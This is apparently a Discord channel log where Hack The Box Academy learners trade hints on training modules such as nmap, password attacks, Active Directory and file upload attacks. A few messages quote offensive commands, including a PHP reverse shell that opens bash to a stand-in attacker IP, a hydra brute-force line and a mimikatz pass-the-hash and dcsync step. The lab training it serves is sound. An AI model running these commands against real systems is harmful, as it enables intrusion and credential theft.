#modules

1 messages · Page 4 of 1

errant lava
#

for what spam

random palm
#

Business

jagged zenith
#

New certificate in htb

livid pier
lethal atlas
#

NICE!!!

lethal atlas
livid pier
#

Nice to be back

lethal atlas
#

how have3 things been?

livid pier
#

exhausting

#

but good

lethal atlas
#

Getting your module put together?

jagged zenith
stiff tiger
#

you can DM me if you are desperate.

livid pier
rustic sage
#

Hi guys, im a beginner in the academy, I’ve just accomplished some tier 0 modules and I’m on the « Network Enumeration with Nmap », section « Host discovery » which explains how we can scan if a host is alive with nmap 😄

I don’t understand the question at the end of the module, I’m supposed to guess the operating system of the distant host just with an ICMP echo request… But how ? 😅

Just give me some hints, don’t tell me the answer 😄

lethal atlas
#

@rustic sage the ttl times can point you in the right direction

rustic sage
#

Oh yes thank you, the response of the ICMP request has a 128 TTL times, that’s a windows system
I didn’t know that TTL times was specific to the host system 😁

lethal atlas
normal laurel
#

Hello,
Could someone please assist me with predictable reset token section of the Broken authentication module(first question)?

west canopy
#

@normal laurel i might be able to help 🙂

normal laurel
west canopy
#

nice

half spindle
#

Anyone else having issues with the VPN dropping?

lethal atlas
#

I have that issue is I have my vpn going on more than one machine or vm

hearty karma
#

hey can anyone help I am super new to hack but want to learn how can someone help me do my first machine

red obsidianBOT
half spindle
errant lava
#

stuck on footprinting MySQL... I can't connect to the server

#

I have tried installing mysql-server again but it wont work

#

🤦‍♂️ nvm

lethal atlas
radiant dagger
#

crackmapexec doesn't work for me either. enither ncrack or medusa. and yeah, metasploit works fine here

radiant dagger
#

Is that because it's just a subdomain/vhost for the inlanefreight.htb?

rugged stag
#

Hi there. Have you been able to solve this (ZAP Active scan not finding the critical vulnerability)? I have the same problem. Thanks and greetings

fresh wedge
#

Question 7 for the active directory skills 2 questions is juicy potatoe the way we supposed to be impersonating to get the Administrator flag?

sly kelp
#

Using Web Proxies

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I need little help related to this question.

#

Can someone guide me

#

I tried to fuzz the decoded cookie but but it is just a random 440 character long string

#

I encoded the decoded payload with base64+hex

#

in reverse order

#

hello, did you complete the using web proxies module ?

austere wyvern
#

hi

#

Ncat: bind to 0.0.0.0:80: Address already in use. QUITTING.

#

anyone knowing what i have to do with this inside the pwnbox

#

i want to listen on port 80 with netcat for phishing with xss

#

but i keep getting this error and i dont know how to check which service is running on 80 on my pwnbox

vital adder
#

@rugged stag @sly kelp for the question in ZAP Scanner i think the first time i do this i end up manually exploit the vuln but i did scan with zap and zap did find that vuln, hint look for ||command injection|| in zap scan output

vital adder
ebon coral
#

I just started the "Intro to AD" module. I'm currently in the "AD terminology" section. There are tons terms that got introduced 😅 . I can understand what they're describing but it's hard to really absorb and memorize them without being able to apply them.

How critical is it to memorize them at this point? Or will I slowly get more familiar with them as I progress through the modules?

ebon coral
#

That's good to hear 🙏 . "memorization" isn't really my strong suit 😅

west canopy
#

The other AD modules are significantly more hands on

ebon coral
#

Nice! I'll be looking forward to those

#

Thanks for the inputs!

west canopy
#

np

sly kelp
fresh wedge
#

Question 7 for the active directory skills 2 questions is juicy potatoe the way we supposed to be impersonating to get the Administrator flag?

gloomy tangle
#

For what I read in the chat, you need to ||log off windows and connect again||

grave dust
grave dust
gloomy tangle
knotty summit
#

hello i m block for an very easy question

gloomy tangle
grave dust
knotty summit
#

it is for HTB academy

grave dust
gloomy tangle
hearty moat
#

hi everyone I am still doing the starting point boxes. im on the 4th box (redeemer) and i am trying to do the nmap scan that the walkthrough mentions but it is taking me hours!! It ran over night and it still says 13hrs remaining... anyone have any recommendations to resolve this...??

#

the nmap scan that its telling me to do is nmap -p- -sV (ip address)

summer lava
hearty moat
timber tide
#

Hey all, I'm having an issue with the Footprinting Medium Lab, if anyone is available for some guidance? I am trying to mount the NFS share, but I keep getting errors that I'm not able to view the mount, even after mounting it as sudo, and trying to change the mount folder permissions, etc.

knotty crag
#

hello guys

#

if i want to practice hacking

#

what should i do

#

make a pc or use hacklab from hackthebox or use a vm

small pawn
#

when I am installing cifs-utils , I am getting following error

#

cifs-utils has no installation candidate

acoustic owl
lethal atlas
#

So close to finishing password attacks. Only took a week lol

short flame
#

After long hours on the broken authentication skill assessment it's time to ask for some help. I got some users (more than the two obvious ones) and reduced the rock vocabolary to less than 50 entry. Now I suppose that I miss something somewhere. Any hints?

lethal atlas
#

also when attempting to get the password you need to set a delay between attempts

short flame
knotty summit
#

i have no the interface tun0

#

can someone help

onyx dust
#

connect to the vpn

knotty summit
#

the VPN is OK

#

it is another problem

onyx dust
#

¯_(ツ)_/¯

#

sorry i'm not a certified bug bounty hunter so idk what to do

grave dust
#

@onyx dust i saw u had pb with ObjectAceType i ran the command with the sid but it doesn't ends and it doesn't give me the ObjectAceType

twin gulch
#

Guys. I’m at skill assessment of Nessus. Tried to run the scan against the target but looks like it don’t detect it (I’m at the vpn of htb, checked). There is a mention that I’m supposed to log in to ssh, but why? I have my own Nessus

onyx dust
#

on the shell

hearty moat
twin gulch
onyx dust
grave dust
onyx dust
#

what's the url

twin gulch
onyx dust
#
twin gulch
#

I got it bro thanks!

rugged stag
#

Hi, may I ask you if you've been able to solve this? I did the fuzzing on the 32nd character of the MD5 sum with the encoding steps from before (in reverse order) but Burp Intruder only shows 200 response codes. Do you have a tip for me? Am I missing something here? Thanks!

vital adder
maiden field
#

Hey, i’m having some trouble on the last question of login brute forcing. When I try to bruteforce the ftp I get an error message saying unknown service.

Here is my command i’m already connected with ssh on the computer. hydra -l g.potter-P harry.potter/rockyou-30.txt ftp://127.0.0.1

west canopy
#

@maiden field your command looks right

#

sec i will DM you

maiden field
rugged stag
lethal atlas
#

THANK GOD!!! and @vital adder and @west canopy. Passwoed attacks is complete!!

lethal atlas
#

dm me

broken warren
#

Does anyone have their own domain name? And if so what are your pros & cons, and regrets what would you do over? . Im primarily looking to build a website as sort of a "business card" for when I get offered IT jobs. Ive tried Hostinger and I that's been not good, and I've looked into Domain.com. (sorry this isn't module related, I just trust your guys opinions over YouTubers)

vital adder
broken warren
#

That sounds ideal, I'm gonna get googlin

vital adder
lethal atlas
maiden field
lethal atlas
maiden field
#

So its P not p

lethal atlas
#

I read it wrong. I thought you had it the other way around

maiden field
#

np

feral stump
#

Hey everyone!

#

On the smtp footprint for the username question the wordlist provided as resource in the module does not match

#

Can anyone suggest a hint pls?
Thanks a lot!

#

Already tried with smtp-user-enum and metasploit with 2 different wordlists

#

🤔

acoustic owl
feral stump
#

I got with ||nmap smtp-enum-users a list of 10 users|| but those don’t work

#

I will try increasing the query timeout

#

Thanks @acoustic owl

heady hamlet
#

From yesterday I was stating I was having problems running waybackurls from the Information Gathering nodule. I have figured out that I have to run it like this.... ~/go/bin/waybackurls -dates https://amazon.com > waybackurls.txt

feral stump
#

Got it !

austere wyvern
#

anyone who has done the xss module that can help me? the xss works but i have difficulty intercepting

drifting wharf
#

🤫

full mica
#

Hello, anyone who can give me a hint on the "Documentation and Reporting" Skills Assessment? Based on the provided artifacts, I have currently no idea how to move forward...

candid sandal
#

I'm trying to understand how this reverse php shell works <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

#

so it is executing the bash shell binary and redirects the output to a tcp connection on port 443 ?

#

Does it mean that I need to open a connection on port 443 to get access to a reverse shell launched by this line in the attacked machine ?

lethal atlas
candid sandal
#

Thanks !

trim yoke
#

Hey am curious about the dnsadmin step on the windows priv esc module I was able to get the dll to make me a domain admin, but I wasn't able to directly access anything (or follow the guide to reg delete some things to be able to start up the dns server again) because of access denied privs etc. even though I right clicked and ran as administrator. I was able to get past this in some other way but is this normal behavior? I did not have access to the administrator's folder on the server as a domain admin, nor did I have access to use commands like reg

#

I fought hard to get a reverse shell instead but it never worked for me 😢

rugged stag
#

Hi Kvesta, have you been able to solve this? I'm having the same problem.

acoustic owl
trim yoke
pliant vessel
#

dm me if you want

rustic sage
#

In the XSS module.. it shows only very basic XSS. For the exam, should you be able to do 'advanced' XSS payloads?

acoustic owl
rustic sage
#

Hello guys, I’m stuck in the « network enumeration with nmap » module, at the Firewall and IDS/IPS Evasion - Merdium Lab…
I’m supposed to submit the DNS server version of the target… the target use the Google DNS, the target has the 53/tcp port filtered… I tried to open the port from a different source Ip, from another source port… but I’m stuck here for a few hours now 😅
Can someone help me with a few hints ? 😁

rustic sage
acoustic owl
rustic sage
high magnet
#

Hello everybody 🙂 I just solved sqlmap essentials Attack Tuning case#6. It was clear to me, that the exercise wants me to use the --prefix/--sufix switches. Is there any better why than to just try all kinds of combinations I can come up with? In theory the dev could use a arbitrary amount of duble quotes, back ticks, single quotes and parenthesis, correct?

frigid ingot
#

Could I get some assistance with the Information Security Foundations pathway? I'm sure i'm answering a question right however it's not accepting the answer

modest token
#

I need some help with PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment. Can't get the answer for question 3. I pivoted into the second host ran ipconfig and found the second network interface, but I pinged every host on the network and got nothing. I tried using cmd and powershell, but nothing... Is there something I should be doing differently? I'm so lost.

acoustic owl
rustic sage
#

Hi, I’m on the last section of the « network enumeration with nmap » module, the hard lab
Do you know which service the client is talking about ? The hint mentioned that they require a large amounts of data, so I though about MySQL but the 3306 port is closed on the target… I need help 😢😅

acoustic owl
frigid ingot
#

the question is what does linux pam stand for, im inputting pluggable authentication module and its still giving me an error: incorrect answer

acoustic owl
#

Linux Pluggable Authentication Modules (PAM) is a suite of libraries that allows a Linux system administrator to configure methods to authenticate users. It provides a flexible and centralized way to switch authentication methods for secured applications by using configuration files instead of changing application code. There are Linux PAM libra...

frigid ingot
#

@acoustic owl i have, i've copy pasted exactly from wikiipedia and still no go

acoustic owl
#

reload the site and try then again

rustic sage
acoustic owl
rustic sage
acoustic owl
west canopy
#

hello friends

rustic sage
#

Hello 😄 I'm having fun learning CBBH, I find well designed even for a noob like me, I like the way that we practice all the learning paths. Aside of that, I feel that I would like to have suggested boxes related to the chapters we learn.

west canopy
#

After you complete a module they give a list of related boxes i believe

onyx dust
#

is anybody here a pentester in real life for a job?

wheat garden
onyx dust
#

you're telling me haha 😉

#

but i meant for a paycheck and i was jw how much like htb content is it

wheat garden
onyx dust
#

oh. i wonder because this tweet https://twitter.com/sno0ose/status/1480786831272824832 makes it seem like the htb content is different

Been looking for a senior pentester for a 2 months, getting peeps with 0 exp asking for unicorn money or some experience from hack the box, and no practical. Where is all the damn talent these days?

Likes

269

wheat garden
#

not just I.T and computing

hollow thunder
#

I need a nudge for Password Attacks | Active Directory Attacks & NTDS.dit

wheat garden
onyx dust
#

there is no darkweb work on dread

hollow thunder
onyx dust
#

at least that's what /u/Becky told me

hollow thunder
#

I'm hoping the hint isn't misleading me

onyx dust
#

the hint is for the pwl

#

fasttrack password list

hollow thunder
#

oh I thought the hint was referring to using --ntds on crackmap

onyx dust
#

make a username list with username anarchy or

hollow thunder
#

thanks

onyx dust
#

then try those names with that password list from the hint. you should get the answer

onyx dust
#

yeah ?

#

what work are you talking about it's mostly drug addicts

#

on the reddit of tor, called dread, there is no work -- at least that's what i hear from /u/Becky

wheat garden
onyx dust
#

ok

#

nobody hiring out there they only want u to phish icloud

#

¯_(ツ)_/¯

#

you can see the user becky on the versus subdreddit talking about baby formula before the united states congress

#

versus the one that was raided

#

but that's for another channel or DM i think

#

i'm here 4 the modules

wheat garden
#

very little entry level stuff

onyx dust
summer lava
#

Executing SQL command.. but it doesn't work
show tables; i remember a kind of super command need to be added first like <super> show tables; i just forget
please help

onyx dust
#

show databases;

#

use database;

summer lava
#
[-] ERROR(ARCHETYPE): Line 1: Could not find stored procedure 'show'.
SQL> 
onyx dust
#

oh mssql?

summer lava
#

yes

onyx dust
#

does tht work 4 u?

ocean night
#

@grizzled dune apparently we were both blind from scrolling, here are the Academy channels 😄

summer lava
#

thanks mn

ocean night
#

yeah

#

How the hell did we both not see these channels lol

grizzled dune
#

Idk

#

So where is it?

ocean night
#

This is the channel to discuss modules, and there are other channels for other sections of Academy

grizzled dune
#

Perhaps I am blind

ocean night
#

It's under the category HTB: ACADEMY on the left

grizzled dune
#

Oh

#

We are here in academic

ocean night
grizzled dune
#

Lol

ocean night
#

😄

grizzled dune
#

Well I’m blind

ocean night
#

Sorry! Me too apparently

grizzled dune
#

Oof

lyric echo
#

hey! Could someone please help me with Weak Brute Force module Q#2? Im stuck and no sure what else to try

lyric echo
#

nevermind, Got it

ocean night
#

Noice 🙂

native quarry
#

Hey all, maybe someone can help me with this: I'm trying to setup a fully interactive tty in a reverse shell.

Here's the commands I've run:
(On host) nc -lvp 9443
(On remote) curl http://ip:port/link/to/image.php
(On host) python3 -c 'import pty; pty.spawn("/bin/bash")'

From there, I followed this (https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic) to try and get tab completion

(On host) ctrl+Z
(On host) echo $TERM
(On host) stty -a
(On host) stty raw -echo
(On host) fg
(On host) reset

The guide indicates that I should now being seeing the reverse shell again. I don't. When I hit enter it shows ^M

modest token
#

I need some help with PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment. I know I need to get the password for vfrank but nothing I've done works. I've transferred over mimikatz and I got his NTLM hash, but I can't crack it with hashcat. I'm at my wits end, need some help. Can anyone give me a hint?

ocean night
#

What wordlist are you using?

west canopy
#

@modest token i was able to get cleartext password via mimikatz 🙂

ocean night
#

Ohhh

#

Nice

west canopy
#

sec i will dm!

modest token
ocean night
#

Take it to dm 🙂

iron plaza
#

Hey peeps, I am on the stack based buffer overflow - Windows (module/89/section/946) ... I am following the instructions to convert the pattern text file to a .wav file. However, when using IDLE to run the python code to generate the file I am getting this message. Any idea why this is the case?

ocean night
#

Python is very picky with indentation

#

That red section.. remove it.. it's a load of spaces or something

#

Make sure indentation is consistent, no mixing of tabs or spaces

iron plaza
ocean night
#

That great big red line - it's likely a load of spaces or tabs

#

Try deleting it

iron plaza
#

did that and it brings the next line up then when I press enter to keep it consistent I get the same message. I am (at least I hope so) copying the instructions on the module exactly

ocean night
#

Well gotta be something to do with indentation, that's clear, not sure what to say

iron plaza
ocean night
#

But yeah.. that big red bar looks like some trailing spaces or tabs on line 4, after f:

native quarry
vale salmon
#

Hey could anyone give me a quick nudge with the Footprinting Medium Lab? I am mounting the NFS Share, but getting Access Denied when attempting to access the directory inside.

west canopy
#

@vale salmon sure DM me 🙂

knotty dove
#

Could someone help with File Upload Attacks -> Type Filters?
Everything I can upload comes back with an error from the server when I try to access the uploaded file saying the uploaded file contains errors and cannot be displayed.

quiet prism
#

can someone help me with vhost fuzzing (information gathering - web edition)

knotty dove
#

maybe lol
Whats the question

vital adder
vital adder
knotty dove
#

It looks like all .php are blocked, so I tried the others in the seclists list (.phar, .pht phtm phtml)
those all come up as unable to load on the server though

#

for the filename
For the payload I tried the php webshell with a GIF and JPEG magic byte

quiet prism
vital adder
knotty dove
#

Sorry can I dm screenshot? I think I'm doing that, but I might be missing something

vital adder
quiet prism
#

can i dm you?

vital adder
blissful jasper
iron plaza
rancid holly
#

in Password attack module are we supposed to perform privilege escalation in any section, as I am stuck in two sections where root password is needed
or maybe I am overlooking something

sterile wyvern
#

Im stuck on the same part. Can I DM you?

polar widget
acoustic owl
rancid holly
old cove
#

i'm doing the ssrf module and this snippet for automating exectution keeps giving parse errors. I have tried to run it directly and also as a bash script.I did put in the actual target ip

boreal vine
#

I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?

grave dust
#

on the AD module, skill assessment 1 i'm blocking on this question

dense ferry
grave dust
timber tide
onyx dust
grave dust
#

cracked

onyx dust
#

i have instructions on the forum on how to make a tunnel

#

one sec

#

after you make a tunnel u can xfreerdp into it from your attack host using the credentials you got

#

there is another user in the thread doing it with msfconsole and autoroute

#
#

but the way i posted is a windows way

#

where you can just have the luxury of copy pasting stuff into it

#

no need to setup any listeners or anything

#

to transfer files between attack and target locations

grave dust
onyx dust
#

did it work?

grave dust
onyx dust
#

u can use same IP as in the command if it's the 172. address

#

172.16.6.50

onyx dust
#

i did the nslookup from teh webshell when i was getting the information

grave dust
onyx dust
#

u only need to go to the dc01 host from there

#

i like making the rdp tunnels because you can use /pth:$HASH with xfreerdp and it's just nice.

grave dust
onyx dust
#

yeah in case u dont have a password or cant crack it, it's nice.

grave dust
onyx dust
#

?

#

the t***** user?

onyx dust
#

u can do it locally then do the attack as that user

#

like this mimikatz sekurlsa::pth /user:t* /ntlm:<ntlm> /domain:inlanefreight.local /impersonate

#

then can do the attack from mimikatz too using lsadump::dcsync

#

i used all windows exe and rdp tunnels for this one

#

idk what you're doing

worthy yoke
#

hi everybody , im stuck in Broken Authentication - Bruteforcing Cookies question 1 , i tried decrypting the cookie with base64 + ASCII hex then changing the user htbuser role to admin , superadmin , administrator etc with burpsuite and reverse encoding to generate the cookie but couldn't find the flag , can anyone give me a hint ?

grave dust
dire quest
#

Honestly, the killer app of HTB Academy is introducing you to a bunch of tools you never knew existed

onyx dust
dire quest
#

I do disassemblies all the time in my day job but decided to do Intro to Assembly Language anyway, and using GEF in gdb is a gamechanger

onyx dust
#

it's pronounced GEF

#

btw

grave dust
onyx dust
#

no

#

you can do a number of things with the admin hash like try evil-winrm from linux

#

idk why you're experiencing that problem but u can also do as an argument to cmd.exe /c type C:\users\administrator\desktop\flag.txt &&echo&&pause and it will persist

#

since you know what you're going to do with the cmd anyway u can just pass as an argument

#

¯_(ツ)_/¯

grave dust
onyx dust
#

w00t

spare maple
#

could someone help me with this. got stuck for days!!!

#

module SQL INJECTION FUNDAMENTALS

#

section query results

acoustic owl
spare maple
#

i also tried that.

#

still same error

acoustic owl
#

Are you connected to the Academy VPN?

#

what says ifconfig tun0

west canopy
#

@spare maple i justed tested on pwnbox and I am able to connect to mysql

spare maple
#

may i dm you mate!!

obsidian sonnet
#

Hi there, anyone who can help me with Upload File Attacks? When i've managed to upload the shell and I want to go to there, it only displayed the php code. Not the shell. I've downloaded the shell from phpbash... I don't get it what I'm doing wrong.

winged hedge
obsidian sonnet
#

Yeah

winged hedge
#

what's this IP?

obsidian sonnet
#

when i open it in the firefox browser, it execute half :-p, but can't do anything with it

winged hedge
#

before you say anything else please tell me what is this machine?

obsidian sonnet
#

Parrot.

winged hedge
#

the webserver

obsidian sonnet
#

Or you need to have the IP?

#

Chrome

#

No Firefox sorry

#

206.189.117.48:31166

obsidian sonnet
#

Thanks!

winged hedge
marble raft
#

hey there! Can someone help me in the Password Attacks Module? I'm stuck at the mutated password section

obsidian sonnet
light creek
#

Hey people. I am having trouble with one task on the Linux Fundamentals. When it says to press Ctrl+W it just closes my tab. Is there a easy way to disable it or ????

shut owl
light creek
#

pwnbox

acoustic owl
# light creek pwnbox

remember that PwnBox runs in your browser. Therefore the keyboard shortcuts do not apply there.

dense ferry
#

For the Password Attacks: Network Services exercise, is there a way to get the username for WinRM without bruteforcing all combinations?

kind flume
#

For "Password Attacks: Credential Hunting in Linux", I am having trouble bruteforcing the initial foothold to run the local Linux tools. I tried the hint (||Kira:LoveYou1||) and searched Discord history. I also tried the password.list and mutations of LoveYou1. Am I missing something obvious?

west canopy
#

@kind flume try looking in your ||mutated password list for mutated versions of "LoveYou1"||

final frigate
#

Hey @west canopy can I dm you?

west canopy
#

sure

grizzled cobalt
#

Disregard, got it sorted. ~Working through Nibbles. When I try to sudo the monitor.sh file for privesc to root, it asks me for nibbler's password. Not sure what I'm doing wrong. I've been through this one before and don't remember experiencing this issue.~

grave dust
#

I've used every enumeration tool of the Active directory module skill assessment 2 but can't get any user, any help ?

raven cairn
#

Can I have help with the Assembly Skills Assesment please?

raven cairn
#

I've added this to the end of my assembly code.

#

I've removed the movabs, properly assembled and linked it,

#

Ran it in GEF, the program eventually ends with a SIGSEV; I am unsure how to get the flag --the instructions are a bit confusing

livid pier
#

anyone finish attacking common services?

vital adder
livid pier
#

im a noob and didnt know how to read emails, got it now

#

thank you

normal laurel
#

Heyo,
Could someone give me a little nudge for the Web Service and API Attacks Skills Assessment please?

quasi wave
#

Is information security fundamentals preferred before doing bug bounty path or just Jr Pentester?

raven cairn
#

Information security path will give you a foundation that will help you with the other modules

quasi wave
#

Ok I see thanks

thorny sage
#

im on the zap scanner module... and i think im stuck... but not completly stuck.. wondering if someone can give me a hint if i show u what i found so far..

#

I got this far... but not sure where to go next..

#

trying to find the flag.txt... ive gone through most of the directory's i could find using the ping.php utility... haven't found the file yet so wondering if there is anotehr step and i have to crack that hash

quasi wave
#

How much of the HTB VIP boxes utilizes web hacking

#

Like I just wanted to ask

#

I want to gain advanced web app hacking skills

thorny sage
#

FFS nm i found it

onyx dust
raven cairn
onyx dust
#

i sent you in DM my loop unrolled xor decryption

#

step thru that in your debugger

raven cairn
#

I’ll take a look at it 👍

onyx dust
#

😎

onyx dust
quasi wave
#

Do advanced HTB boxes require advanced web app hacking skills?

raven cairn
#

I would say most of the boxes in HTB use some sort of web hacking

#

There is also an increasing trend to move everything to web

quasi wave
#

Ok

raven cairn
#

It is a very invaluable skill

quasi wave
#

So would HTB boxes all build upon bug bounty pathway but go over more advanced?

#

Like can I gain advanced web hacking skills via HTB?

#

I want to become a well-rounded hacker but I want to make sure I include web

quasi wave
#

Nice ok

raven cairn
#

The bug bounty pathway is very comprehensive

quasi wave
#

Ok

#

But does regular HTB VIP go beyond the CBBH pathway?

raven cairn
#

CBBH is still a great start tho

#

For hackthebox machines you are going to want to learn how to do privilege escalation in windows and linux

#

Also when you start doing boxes don't be afraid to use writeups and IPPSEC at first

#

HTB is a bit of a learning curve

quasi wave
#

Ok

raven cairn
#

If you have any other question lmk

#

I love answering questions

quasi wave
#

I want to get good at bug hunting. Is practicing IRL good while doing HTB VIP?

raven cairn
#

But I think it would be very helpful

quasi wave
#

Ok thanks

raven cairn
#

Hackthebox+Hackthebox academy are great for learning theory

#

But I don't think anything can beat doing things in real life

quasi wave
#

Ok

#

So as soon as I get CBBH certified then I should immediately start bug hunting right?

raven cairn
quasi wave
#

Ok thanks

#

I’m just finishing Linux fundamentals path right now

#

About to do Windows fundamentals

onyx dust
#

u can hunt bugs for freeeee

quasi wave
#

I know but I want to be a competent bug hunter

onyx dust
#

u dont need a certification

#

only the training 🙂

quasi wave
#

Ok

#

But a certification exam would verify I learned from the training right?

onyx dust
#

right

#

get it for the vanity

quasi wave
#

Ok ya

onyx dust
#

but u dont need the cert to submit bugs u just need the product of the training

quasi wave
#

I know

carmine hill
#

Hi there! Can someone help me with the Predictable Reset Token question1? I have the script to generate tokens using username+time, and have used the epoch ending in 000 as the example suggests, but no luck.

quasi wave
#

Do any of HTB boxes require Python skills?

onyx dust
carmine hill
#

Oh yeah, I'm trying with seconds between +-1000 and +-1500, but it didn't work neither

onyx dust
#

what's taht module name

#

i forgot

carmine hill
#

Broken Authentication module

onyx dust
#

you have to use like 1000.1 1000.2 etc etc

#

if i remember correctly

knotty dove
#

Looking at broken auth -> weak bruteforce protections q2, from the task outline it looks like I just need to modify the python script from the last exercise to add another header, but I'm not getting anything
Have I misinterpreted the question?
Cheers

frigid ingot
#

So I’m not sure I’m doing the command right, I’m not, but with module 18 section 75 is asking index number of sudoers file in the etc directory

#

Command is ls -I /etc/sudoers and it gave me 964110 is the index, what am I missing?

quasi wave
#

So I should learn Python to practice HTB?

#

Is Python or scripting a skill I need for advanced boxes?

#

Is that what this convo is about?

quasi wave
#

Hi do I sound silly when I ask how much scripting skills and what languages are good for HTB?

#

Can I get away with just Python?

#

At what level do boxes require Python?

ebon coral
wheat garden
#

look in the info category of vulnerabilities highlighted in blue that concern SMB. Can filter some results by filtering for vulnerabilities on port 445

onyx dust
wind plaza
#

can anyone help me with this

onyx dust
wind plaza
#

got it !! thx

radiant dagger
#

solved it by using subbrute and axfr. trick part it to find the nameserver first to make commands working

fringe shell
#

I'm doing the WIndows Privilege Escalation module and up to the Windows Built-in Groups section. The password provided for the svc_backup account doesn't seem to work? I've double-triple checked i'm typing correctly... anyone else had this issue?

ebon coral
quasi wave
fringe shell
arctic patrol
#

SQLi fundamentals, ‘using comments’

Q : Login as the user with the id 5 to get the flag.
A : trying to use this query on username field using comment and or statement , and ‘anything’ password.
OR id = 5')--

*login failed, with this error

Executing query: SELECT * FROM logins WHERE (username='OR id = 5')-- ' AND id > 1) AND password = '321fad32ead0f58206147440dc1ca939';

can someone help me with this?

onyx dust
quasi wave
#

Ok

raven cairn
#

@quasi wave I would recommend understanding common programming concepts and being able to obfuscate code.

quasi wave
#

Ok

raven cairn
#

Which means you should probably know to code

#

Is it really necessary? No

#

Is it very very useful? Yes

quasi wave
#

So would doing a Python development course be a good idea? At what point should I learn how to code? I want to get it done because I want to be able to write my own hacking tools, etc.

#

But I don’t want to spread myself thin and I feel like for me just focusing on the fundamentals would make more sense

#

At what point should I add in Python on top of hacking in your view?

#

I want to know web hacking, wireless hacking, network hacking, Linux exploitation, Windows Exploitation, social engineering, and OSINT, and maybe desktop app and mobile app hacking (and maybe mobile device exploitation)

#

But I could go without the maybes

#

If it’s unrealistic

#

I’m thinking of being able to hack these things employing Python

#

If I remove desktop app/mobile app/mobile device hacking from the list

#

Is that realistic?

#

I want to also possibly know IoT hacking or something like it

#

I am interested in learning to code tho

#

So at what point in HTB does coding become useful?

#

Also knowing how to exploit Mac would be a huge plus but I don’t have to have it

#

My favorite hacking tho would be anything that helps with hacking things over the internet

#

Or at least that’s what I lean towards

raven cairn
#

If you want to learn how to make your own tools you should take a python course beforehand

ebon coral
#

I was in in your position a while back as well. I wanted to learn lots of stuff. However, it felt overwhelming so I decided to slow down and focus on the fundamentals first. I'm now going through the academy modules so that I can have a solid base to which to go into the different possible specializations.

#

I might be a slower path, but I believe it has compounding effects in the long run

raven cairn
#

It’s a marathon not a sprint

livid pier
vital adder
#

is that the Attacking Common Services - Attacking DNS section? someone i help on that same section found a pornhub subdomain
#modules message

livid pier
#

lol yes exactly

#

i have found 5 questionable subdomains

#

that one stuck out tho

quasi wave
raven cairn
quasi wave
#

right obviously

#

ok

#

If I asked you if a specific Python course on Udemy was good for tool building in terms of extensiveness, would you be able to look at the course curriculum and tell me if its an appropriate course?

#

there are three I am looking at

raven cairn
#

start there

quasi wave
#

ok

#

fair

#

I mean

raven cairn
#

However it won't go super deep probably

quasi wave
#

but lets say for when I need to go super deep

raven cairn
quasi wave
#

like I am wondering if Angela Yu's Python course, Colte Steel's Python course, or Tim Buchalka's Python course, is best?

#

ok thanks

#

so I don't need a Udemy course?

raven cairn
#

Not sure.

#

I learned by fucking around to be honest

quasi wave
#

I mean I guess I could learn for free

#

ya for sure

raven cairn
#

just by making stupid games

quasi wave
#

ya

raven cairn
#

everyone learns differently

quasi wave
#

ok

raven cairn
#

that worked best for me

#

But to be honest I don't think making your own tools is super necessary. There are bajillions of programmers who will do the hard work for you

quasi wave
#

ok

#

but what would I use Python for in hacking?

#

because I want to know how to use Python for hacking when necessary or programming in general

#

also I want to be able to program hardware and electronics in Python

#

so ya

#

and automate tasks and maybe make websites in it

#

something like that

knotty dove
#

hardware is probably better with c or another integrated language

quasi wave
#

ok

knotty dove
#

If you mean microcontrollers etc

quasi wave
#

ya

knotty dove
#

C, Rust, Go I think are what you want for that

raven cairn
#

I think you are asking to learn waaaay to much haha

quasi wave
#

isn't Python #1 for hacking tho?

raven cairn
quasi wave
#

I also want to automate tasks, do calculations, and use a language for well-rounded hacking skills

knotty dove
#

hacking just needs automation I think
Do the same thing many times
BAsh might even be better than python depending on what you are doing

raven cairn
#

What is your endgoal?

#

You can't learn everything about hacking at once

#

You got to start slow

quasi wave
#

I want a language that will help me be better at web hacking, wireless hacking, network hacking, SE, and OSINT

#

and maybe IoT

#

but if I had to pick two or three things

#

web hacking, SE, OSINT

#

so a language that made me best at hacking websites, social engineering applied to hacking, and OSINT

#

so ya

worn goblet
#

Step by step

raven cairn
quasi wave
#

ok

#

what would I use?

#

web development?

knotty dove
#

To do web dev?

raven cairn
#

Don't worry much about programming languages now. Just do the CBBH path

quasi wave
#

ok

#

thanks

#

I'm finishing HTB Academy Linux fundamentals path and LinuxJourney (which is a free website that teaches Linux) and then I'm gonna start learning Windows Fundamentals Path

#

just using Linux Journey to reinforce Linux concepts

#

ya

raven cairn
#

Take your time. It's all about the journey : )

quasi wave
#

ok

#

thanks

raven cairn
#

Be patient persistent and consistent

quasi wave
#

ok thanks

raven cairn
#

If you practice hard and smart, you will become an amazing hacker with enough time

quasi wave
#

thanks

#

what does "smart" mean in the context of hacking

raven cairn
quasi wave
#

ok thanks

#

good idea

#

I agree

raven cairn
#

Start with CBBH

quasi wave
#

ok

#

you mean once I get Linux, Windows, networking, InfoSec fundamentals down?

#

thanks btw

quasi wave
#

ok

raven cairn
#

I was in your position not too long ago

#

but For the past months I have been putting in my all

quasi wave
#

ya

raven cairn
#

And I have come really far

quasi wave
#

well its great to see someone who's made progress

#

I mean are there people that are advanced hackers in this Discord that I can ask for mentorship?

quasi wave
#

I feel like there are a lot of people like yourself who can help me but I thought I would sak

#

you give very good advice btw

raven cairn
quasi wave
#

ok thanks

#

that would be great

#

is CBBH something I can complete in six months?

raven cairn
quasi wave
#

ok

raven cairn
#

I think you totally could

quasi wave
#

ok

raven cairn
#

I don't think you should ever rush learning tho

#

Always focus on the journey

quasi wave
#

ok thanks

#

ok

raven cairn
quasi wave
#

ok sure

raven cairn
#

If you want mentorship

quasi wave
#

sure

iron plaza
#

Guys and Gals I am on the stack based buffer overflow for windows and I am trying to create the pattern.wav file to control of the EIP. I Followed the instructions for python as mentioned but when I run the code it pops up IDLE shell but does not generate the .wav file. Any idea what I might be missing in my steps?

livid pier
#

@vital adder any hints on how you ended up defeating it?

remote solar
